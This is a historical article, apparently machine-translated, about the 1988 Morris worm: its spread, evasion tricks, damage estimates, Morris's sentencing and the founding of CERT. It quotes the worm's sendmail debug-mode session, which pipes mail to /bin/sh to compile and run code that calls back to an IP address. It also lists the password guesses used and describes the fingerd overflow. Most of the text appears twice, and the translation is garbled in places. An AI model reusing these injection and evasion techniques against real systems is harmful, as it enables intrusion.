Morris worm - he was the first
On November 2, 1988, the ARPANET network was attacked by a program that later became known as the “Morris worm” - after its creator, a student at Cornell University, Robert Morris Jr. The ARPANET (Advanced Research Projects Agency Network) was created in 1969 on the initiative of the Defense Advanced Research Projects Agency (DARPA) and was the prototype of the Internet. This network was created in the interests of researchers in the field of computer technology and technology for exchanging messages, as well as programs and data arrays between the largest research centers, laboratories, universities, government organizations and private firms performing work in the interests of the US Department of Defense (DoD, Department of Defense). of USA). It was DoD that commissioned one of the three most common transport protocols of the OSI model, called TCP / IP, which in 1983 became the main ARPANET protocol. By the end of the 80s, the network consisted of several tens of thousands of computers. ARPANET ceased to exist in June 1990.
The Morris Worm was the first in the history of the development of computing technology a sample of malicious software that used automatic network propagation mechanisms. To do this, several vulnerabilities of network services were used, as well as some weaknesses of computer systems, due to insufficient attention to security issues at that time.
According to Robert Morris, the worm was created for research purposes. Its code did not contain any "useful" load (destructive functions). However, due to the mistakes made in the work algorithms, the spread of the worm triggered the so-called “denial of service”, when computers were busy making multiple copies of the worm and stopped responding to operator commands. The Morris worm practically paralyzed computers on the ARPANET for up to five days. Estimation of downtime - at least 8 million hours and over 1 million hours of time spent on the restoration of systems. Total losses in monetary terms were estimated at 98 million dollars, they formed their direct and indirect losses.
The direct losses were ($ 32 million):
stop, test and reboot 42700 machines;
worm identification, deletion, memory cleaning and recovery of 6200 machines;
worm code analysis, disassembly and documentation;
UNIX fixes and testing.
The indirect losses were attributed (66 million dollars):
loss of computer time due to lack of access to the network;
loss of user access to the network.
However, these estimates should be treated very, very carefully.
Structurally, the worm consisted of three parts - the "head" and two "tails". The “head” was a C source text (99 lines) and compiled directly on a remote machine. "Tails" were identical, in terms of source code and algorithms, binary files, but compiled for different types of architectures. According to Morris, VAX and SUN were chosen as the target hardware platforms. The “head” was thrown using the following methods:
Sendmail is the oldest network service that handles receiving and sending mail using the SMTP protocol. At the time of the spread of the worm, Sendmail had an undocumented possibility - the developers had programmed a debugging mode, which should not have been in the working version of the program and was left by mistake. One of the features of the debug mode was that the email message was not processed by Sendmail itself, but by another program. An example of an email sent by a worm:
debug
mail from: </ dev / null>
rcptto: <"| sed-e '1, / ^ $ / d' | / bin / sh; exit 0">
data
cd / usr / tmp
cat> x14481910.c << 'EOF'
<program text l1.c>
EOF
cc -o x14481910 x14481910.c; 14481910 128.32.134.16 32341 8712440; rm -f x14481910 x14481910.c
.
quit
As you can see, the headers were removed from the body of the letter (with the help of the text preprocessor sed) and the source file of the head was saved. Further, the command processor was given instructions for compiling the “head” code, running the resulting executable file, and erasing temporary files.
To exploit the vulnerability of the fingerd service, the worm passed a specially prepared string of 536 bytes, which eventually called the execve function ("/ bin / sh", 0, 0). This worked only for VAX computers with OS 4.3BSD installed, this vulnerability was not present on SUN computers running SunOS.
To use the distribution method through rexec and rsh, a list of users of the local machine was collected. Based on it, the most frequently used passwords were selected, in the hope that many users have the same names and passwords on all the machines on the network, which, incidentally, was not far from the truth. In addition to the selection in rsh, a trust mechanism was used, or, according to another simplified authentication mechanism, by the IP address of the remote machine. These addresses were stored in the /etc/hosts.equiv and .rhosts files. For most computers, the trust was mutual, so with a high degree of probability, the list of IP addresses from these files found by the worm made it possible to log into the remote system via rsh without using a password at all
When selecting a worm, I tried the following password options:
The complex use of several propagation methods greatly influenced the mass distribution of the worm in the network. To search for remote computers, the network was scanned based on information from the route table and the infected system’s own IP address.
The worm used several techniques to make it difficult for administrators to discover computers:
Despite the “grandeur” of the idea, the worm had some errors in itself, both in design and implementation. It is the incorrectly implemented algorithm for checking whether the system is already infected, led to the mass distribution of the worm in the network, contrary to the idea of its author. In practice, computers were infected many times, which, firstly, led to the rapid exhaustion of resources, and secondly, it contributed to the avalanche-like spread of the worm in the network. According to some estimates, the Morris worm infected about 6,200 computers. The developer himself, realizing the scale of the results of his act, voluntarily surrendered to the authorities and told everything. The hearing of his case ended on January 22, 1990. Initially, Morris was threatened with up to five years in prison and a fine of 25 thousand dollars. In fact, the sentence was fairly lenient, the court ordered 400 hours of community service, $ 10,000 in fines, a trial period of three years, and payment of expenses related to monitoring a convict.
The incident with the “Morris worm” forced IT specialists to think seriously about security issues, particularly after that, to increase system security, the use of pauses after incorrectly entering a password and storing passwords in / etc / shadow began to take place, where they were transferred from the readable all users of the / etc / passwd file. But the most important event was the creation in November 1988 of the CERT Coordination Center (CERT Coordination Center, CERT / CC), whose activities are related to solving Internet security problems. The first CERT security bulletin that appeared in December 1988 was a report about vulnerabilities used by the worm. It is noteworthy that many technical solutions used by the “Morris worm”, such as using brute force passwords, compiling bootloader code on remote computers running * NIX systems (Slapper), scanning the network to identify targets, etc. applied in modern samples of malicious software.
Interestingly, in the same 1988 well-known programmer Peter Norton spoke rather sharply in print against the very existence of computer viruses, calling them "myth" and comparing the noise around this topic with "stories about crocodiles living in the sewers of New York." Just two years after Norton’s announcement in 1990, the first version of the Norton AntiVirus antivirus program was released.
And finally - in 1988, being impressed by the attack of the Morris worm, the American Computer Hardware Association declared November 30 as the International Information Security Day (Computer Security Day), which is celebrated to this day.
The Morris Worm was the first in the history of the development of computing technology a sample of malicious software that used automatic network propagation mechanisms. To do this, several vulnerabilities of network services were used, as well as some weaknesses of computer systems, due to insufficient attention to security issues at that time.
According to Robert Morris, the worm was created for research purposes. Its code did not contain any "useful" load (destructive functions). However, due to the mistakes made in the work algorithms, the spread of the worm triggered the so-called “denial of service”, when computers were busy making multiple copies of the worm and stopped responding to operator commands. The Morris worm practically paralyzed computers on the ARPANET for up to five days. Estimation of downtime - at least 8 million hours and over 1 million hours of time spent on the restoration of systems. Total losses in monetary terms were estimated at 98 million dollars, they formed their direct and indirect losses.
The direct losses were ($ 32 million):
stop, test and reboot 42700 machines;
worm identification, deletion, memory cleaning and recovery of 6200 machines;
worm code analysis, disassembly and documentation;
UNIX fixes and testing.
The indirect losses were attributed (66 million dollars):
loss of computer time due to lack of access to the network;
loss of user access to the network.
However, these estimates should be treated very, very carefully.
Structurally, the worm consisted of three parts - the "head" and two "tails". The “head” was a C source text (99 lines) and compiled directly on a remote machine. "Tails" were identical, in terms of source code and algorithms, binary files, but compiled for different types of architectures. According to Morris, VAX and SUN were chosen as the target hardware platforms. The “head” was thrown using the following methods:
- using debug mode in sendmail;
- exploiting a buffer overflow vulnerability in the fingerd network service;
- selection of username and password for remote program execution (rexec);
- call a remote command interpreter (rsh) by selecting a username and password or using a trust mechanism.
Sendmail is the oldest network service that handles receiving and sending mail using the SMTP protocol. At the time of the spread of the worm, Sendmail had an undocumented possibility - the developers had programmed a debugging mode, which should not have been in the working version of the program and was left by mistake. One of the features of the debug mode was that the email message was not processed by Sendmail itself, but by another program. An example of an email sent by a worm:
debug
mail from: </ dev / null>
rcptto: <"| sed-e '1, / ^ $ / d' | / bin / sh; exit 0">
data
cd / usr / tmp
cat> x14481910.c << 'EOF'
<program text l1.c>
EOF
cc -o x14481910 x14481910.c; 14481910 128.32.134.16 32341 8712440; rm -f x14481910 x14481910.c
.
quit
As you can see, the headers were removed from the body of the letter (with the help of the text preprocessor sed) and the source file of the head was saved. Further, the command processor was given instructions for compiling the “head” code, running the resulting executable file, and erasing temporary files.
To exploit the vulnerability of the fingerd service, the worm passed a specially prepared string of 536 bytes, which eventually called the execve function ("/ bin / sh", 0, 0). This worked only for VAX computers with OS 4.3BSD installed, this vulnerability was not present on SUN computers running SunOS.
To use the distribution method through rexec and rsh, a list of users of the local machine was collected. Based on it, the most frequently used passwords were selected, in the hope that many users have the same names and passwords on all the machines on the network, which, incidentally, was not far from the truth. In addition to the selection in rsh, a trust mechanism was used, or, according to another simplified authentication mechanism, by the IP address of the remote machine. These addresses were stored in the /etc/hosts.equiv and .rhosts files. For most computers, the trust was mutual, so with a high degree of probability, the list of IP addresses from these files found by the worm made it possible to log into the remote system via rsh without using a password at all
When selecting a worm, I tried the following password options:
- empty;
- username (user);
- username, written opposite (resu);
- double duplicate username (useruser);
- the user's first or last name (John, Smith);
- lowercase username or surname (john, smith);
- built-in dictionary of 432 words;
- the / usr / dict / words file, containing about 24,000 words and used in the 4.3BSD system (and others) as a spelling dictionary. If the word begins with a capital letter, then the version with a lowercase letter was also checked.
The complex use of several propagation methods greatly influenced the mass distribution of the worm in the network. To search for remote computers, the network was scanned based on information from the route table and the infected system’s own IP address.
The worm used several techniques to make it difficult for administrators to discover computers:
- deleting your executable file after launch;
- all error messages were disabled, and the size of the crash dump was set to zero;
- The worm's executable file was saved under the name sh, the same name was used by the Bourne Shell command interpreter, so the worm was masked in the process list;
- approximately every three minutes a child thread was spawned, and the parent thread terminated, and the worm's pid process was constantly changing and the runtime shown in the process list was reset;
- all text strings were encoded by applying the operation xor 81h.
Despite the “grandeur” of the idea, the worm had some errors in itself, both in design and implementation. It is the incorrectly implemented algorithm for checking whether the system is already infected, led to the mass distribution of the worm in the network, contrary to the idea of its author. In practice, computers were infected many times, which, firstly, led to the rapid exhaustion of resources, and secondly, it contributed to the avalanche-like spread of the worm in the network. According to some estimates, the Morris worm infected about 6,200 computers. The developer himself, realizing the scale of the results of his act, voluntarily surrendered to the authorities and told everything. The hearing of his case ended on January 22, 1990. Initially, Morris was threatened with up to five years in prison and a fine of 25 thousand dollars. In fact, the sentence was fairly lenient, the court ordered 400 hours of community service, $ 10,000 in fines, a trial period of three years, and payment of expenses related to monitoring a convict.
The incident with the “Morris worm” forced IT specialists to think seriously about security issues, particularly after that, to increase system security, the use of pauses after incorrectly entering a password and storing passwords in / etc / shadow began to take place, where they were transferred from the readable all users of the / etc / passwd file. But the most important event was the creation in November 1988 of the CERT Coordination Center (CERT Coordination Center, CERT / CC), whose activities are related to solving Internet security problems. The first CERT security bulletin that appeared in December 1988 was a report about vulnerabilities used by the worm. It is noteworthy that many technical solutions used by the “Morris worm”, such as using brute force passwords, compiling bootloader code on remote computers running * NIX systems (Slapper), scanning the network to identify targets, etc. applied in modern samples of malicious software.
Interestingly, in the same 1988 well-known programmer Peter Norton spoke rather sharply in print against the very existence of computer viruses, calling them "myth" and comparing the noise around this topic with "stories about crocodiles living in the sewers of New York." Just two years after Norton’s announcement in 1990, the first version of the Norton AntiVirus antivirus program was released.
And finally - in 1988, being impressed by the attack of the Morris worm, the American Computer Hardware Association declared November 30 as the International Information Security Day (Computer Security Day), which is celebrated to this day.
')
Source: https://habr.com/ru/post/160337/
All Articles